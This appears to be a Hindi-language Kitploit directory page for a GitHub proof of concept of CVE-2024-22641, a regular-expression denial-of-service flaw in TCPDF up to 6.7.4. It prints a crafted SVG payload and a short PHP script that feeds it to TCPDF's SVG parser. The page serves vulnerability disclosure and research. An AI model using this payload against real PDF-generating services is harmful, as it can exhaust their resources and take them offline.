Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-22641 — CVE-2024-22641 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: TCPDF <=6.7.4 में ReDoS भेद्यता जो क्राफ्टेड SVG फ़ाइलों द्वारा ट्रिगर होती है, रेगेक्स बैकट्रैक सीमा समाप्ति का प्रदर्शन करती है। | Kitploit
उपकरण/GitHubGitHub/zunak/cve-2024-22641
भेद्यता विश्लेषणशोषणवेब सुरक्षाफज़िंगपेपर और शोधलर्निंग और शिक्षा
GitHubzunak/cve-2024-22641

CVE-2024-22641

CVE-2024-22641 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: TCPDF <=6.7.4 में ReDoS भेद्यता जो क्राफ्टेड SVG फ़ाइलों द्वारा ट्रिगर होती है, रेगेक्स बैकट्रैक सीमा समाप्ति का प्रदर्शन करती है।

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-22641

भेद्यता प्रकार

रेगुलर एक्सप्रेशन सेवा अस्वीकार (ReDoS)

प्रभावित उत्पाद और संस्करण

TCPDF <= 6.7.4

हमला वेक्टर

TCPDF क्राफ्टेड पेलोड वाली SVG फ़ाइल को पार्स करता है।

विवरण

TCPDF संस्करण <= 6.7.4, अविश्वसनीय SVG फ़ाइल को पार्स करने पर ReDoS (रेगुलर एक्सप्रेशन सेवा अस्वीकार) के लिए संवेदनशील है।

PoC

root@kitploit:~
<!--poc.svg-->
<svg
  version="1.1"
  xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle clip="rect(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!)"/>
</svg>
root@kitploit:~
<?php
require_once('../tcpdf.php');

// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);


// add a page
$pdf->AddPage();

$pdf->ImageSVG($file='poc.svg');
?>

नोट: भेद्य कोड लाइन के बाद preg_last_error() से जाँच करने पर, regEx PREG_BACKTRACK_LIMIT_ERROR के साथ बाहर निकलेगा।

टूल डाउनलोड करें